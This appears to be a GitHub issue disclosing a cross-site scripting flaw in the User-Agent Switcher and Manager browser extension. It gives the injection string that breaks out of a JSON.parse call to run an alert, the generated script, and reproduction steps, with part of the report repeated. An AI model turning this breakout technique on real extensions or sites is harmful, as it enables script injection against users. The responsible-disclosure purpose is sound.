You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I was able to perform a Cross-Site Scripting attack using the User-Agent Switcher and Manager on Chrome build 105.0.5. This persisted across the browser until the User-Agent was removed
document.currentScript.dataset.injected = true;
const o = JSON.parse('{"userAgent":""}'); alert(document.domain);// const o=JSON.parse('{"userAgent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36","appVersion":""}'); alert(document.domain);","platform":"","vendor":"Google Inc.","product":"","oscpu":"[delete]","buildID":"[delete]","productSub":"20030107"}');
for (const key of Object.keys(o)) {
if (o[key] === '[delete]') {
delete Object.getPrototypeOf(window.navigator)[key];
}
else {
navigator.__defineGetter__(key, () => {
if (o[key] === 'empty') {
return '';
}
return o[key];
});
}
}
}
I was able to insert "}'); alert(document.domain);// into the User-Agent Switcher and Manager and return a JavaScript alert box. This was tested on Firefox as well and succeeded.
Steps to reproduce:
Download User-Agent Switcher and Manager
Enter in custom User-Agent - "}'); alert(document.domain);//
Note the JavaScript alert box
Please let me know if I can do anything to help in this situation. Thank you!
The text was updated successfully, but these errors were encountered:
Hi there,
I was able to perform a Cross-Site Scripting attack using the User-Agent Switcher and Manager on Chrome build 105.0.5. This persisted across the browser until the User-Agent was removed
I was able to insert "}'); alert(document.domain);// into the User-Agent Switcher and Manager and return a JavaScript alert box. This was tested on Firefox as well and succeeded.
Steps to reproduce:
Please let me know if I can do anything to help in this situation. Thank you!
The text was updated successfully, but these errors were encountered: